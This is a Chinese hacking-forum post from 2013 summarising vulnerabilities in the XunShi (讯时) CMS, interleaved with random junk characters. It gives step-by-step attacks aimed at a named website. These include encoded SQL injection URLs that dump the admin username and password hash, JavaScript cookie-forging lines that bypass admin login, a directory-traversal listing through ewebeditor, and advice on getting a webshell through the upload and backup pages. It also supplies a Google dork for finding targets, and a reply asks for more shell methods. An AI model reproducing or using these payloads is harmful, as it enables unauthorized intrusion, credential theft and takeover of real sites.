找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2579|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
/ }9 S; l# |' D: ^2 Y0 X8 L) x' p* `9 u1 W  k
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
$ Q. J6 t9 k3 N! ]6 Y- m
  R3 |$ \* K" ~0 T- `8 `. ]1 n* b以下本文总结来自黑防去年第9期杂志上的内容...
# t4 `# v; r8 k3 L, ^3 Q- Q. P) U! \4 k
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
" K  k8 S% E% w" Z1 S! G% H+ S. l3 U7 L% i1 c( T. ?4 J! ]) O
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
9 N2 L8 P; S) }& g7 s1 ?+ k0 i: z- n; L
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
" X7 @! P$ P# c  L4 _这里一个注入5 D' J4 o! o  p$ g( L$ M3 p$ V' J2 O
' E1 c1 F( v! e& ^; v& L
效果如图:
  s) c4 H" Y4 @( {% v
/ s6 c( Y4 x9 v4 p8 l. g - `5 ?  ^- w* J/ s: u) d
; o' {5 m  s! P/ Q+ b+ D
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
  n5 t3 u# I$ `) v! _+ O1 v8 P/ ?+ S
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
5 f$ I# g, }% P7 y8 K3 \9 Z3 P- \% i7 u9 i9 k9 w; L1 D5 u8 S" g
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
) ~. y/ h# x# `7 T% s+ U8 s7 H; \. V6 Q* V
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
" [$ Z1 R6 E. q7 u; n1 }. Q! s1 \- |3 ~! {& \0 t6 ^- N
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞. z1 \1 |9 W5 M5 H1 E8 j' Z

/ s2 W1 L* f; j' u它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
, C3 }& }2 I  o# S& h. J; X$ Q8 p  C( f7 G( d% t7 i
访问这页面来列目录..步骤如下:
& d. I  P: B0 Y6 K, Z) D
% \( }% h: I1 E; u! {# l5 C! Rjavascript:alert(document.cookie="admindj=1")
; [0 C8 E: `3 F- u! Z% T& L; J! E4 w. Y* g9 J2 L$ j% x3 X; @
http://www.political-security.co ... asp?id=46&dir=../.." X8 O! s' D  o$ G; v

- |3 g$ F' C, y) Z( Z3 G. K, M效果如图:
5 v0 ^; \1 @' w; U* m. o; a6 |$ d( P6 Z. k
9 m( T2 M8 V( Q+ l
6 R" m# J& `# I4 ^/ t7 r
这样全站目录都能瞧了..找到后台目录..进去..
7 l  U: j' a8 ?7 Z: ~
1 ~) w+ d* x8 c+ d  d那么进了后台怎么拿shell??上传--备份就ok了..
( X0 H/ A3 s0 n) q( t7 |' _) g5 a# {5 B
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..1 X6 u; [7 D0 o* ^/ H- N; J( S
7 ?- Y  b  W; ^' z8 x/ V  {9 C! Q
这个我也碰到过一次..你都可以通过列目录来实现..
+ h. g9 y7 ~) a2 }) D. l2 D; z- N! ?  k# \
javascript:alert(document.cookie="admindj=1") ' d+ G1 q' h7 \  C* m

" _6 d+ M3 f, N& `. i" d9 S8 Thttp://www.political-security.co ... p?action=BackupData 2 c0 m# h0 A2 |& {! g& N& v- v- b
0 F4 {( [& f+ E# Z
备份ok..4 I7 i- R0 c" `  R9 D
5 ^4 p) f: g4 I. e9 _! p
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?" I9 U" [% C  ]* {3 }

3 \7 n) t3 m. @& w% N在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下; ]! m. L7 U. R/ v, M, L6 @9 x

' c2 T% N+ {' ~+ }3 _5 w然后访问此页面进行注入..步骤如下:
3 S3 \# ^1 u3 f, Y' Y* W5 Y" s6 f1 a+ t' h- p
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")5 A4 ~' h8 `7 m) U

- C0 d9 z% i4 b然后请求admin/admin_chk.asp页面! g/ l- j. Z) z1 K

2 z6 a0 p( M2 ?/ }输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%3 M2 |: w  e" O

; t6 r; p; r/ Q26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin; Z7 w! K: I5 {0 w# m, t

! x( N% ^, o/ Z/ v: ^7 ?3 Z效果如图所示:( F* ^4 n$ u  N* O# g! Q6 a- s

' p6 v. W# L8 V$ C3 m
; D4 e4 B3 o* [
: ^9 {$ t1 a0 k- L4 Q2 a讯时漏洞2
4 a; `+ R  u8 ]" k1 ~" E/ @, E- T3 A8 rgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
$ x3 g( P8 l4 H  S9 o  @5 W/ r2 z
8 G! F5 ?6 ]1 H8 n; o& D0 a& T1、/admin/admin_news_pl_view.asp?id=1
+ v' A* i2 K& q//id任意 填入以下语句
2 U$ f& u" D2 k, A! }; x3 ] . r; L+ w3 j" }9 J' g" s! `& }9 G
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
9 a0 w3 o! h9 {6 v
( h  A1 Z" }- I2 k6 N
! D: h% x* A9 i
2 V1 H9 ~/ t  D0 {3 H: j3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
  Z( V) X  m" {% [& }" g+ Q+ L  }" F 2 S: v; P3 _; ~& |

! d; g$ O: I2 \3 l) S( C( z1 y' A0 A- S5 S+ Y$ L
爆出管理员帐号和密码了% M$ A0 J6 _/ G' Q& Y; R+ W  s

4 q- Y5 X; n! s5 V9 B
6 T2 _$ ~0 F0 |" ^9 g* x& U
! w! ^6 {# ]3 J, \4、cookies进后台, c" `8 m* q/ x9 H

* b  f. U, K) f: Z! Y& t0 Djavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
! B% h4 N3 P8 k5 @* T, G
5 ]6 o- \( g; n; s8 z' `' l7 X/ q  e# s4 o

) K( a/ K0 t% }( x5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
! w1 C3 a) R7 }8 |   ^; f0 f2 E4 W& p: ^1 |

5 j* {0 M- x% Y: r( {7 w% ]: {8 S
6、后台有上传和备份取SHELL不难。
& z4 W6 e7 c4 B( l" p & u% z7 M5 o# `* M& ^' c( x; V
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../.." {. ^- _6 Y1 T  i5 @! c/ r5 G, `& z

! L& `1 Z" B$ ]3 ^逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
6 L) m7 L- W# \  I) Y
, y" ?+ [7 f. g, D9 Y" j, \, C( }/ h
8 C1 D" Z& g: o; D' i8 M& w
7 M0 W* B0 `' Z% o# ?: H4 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表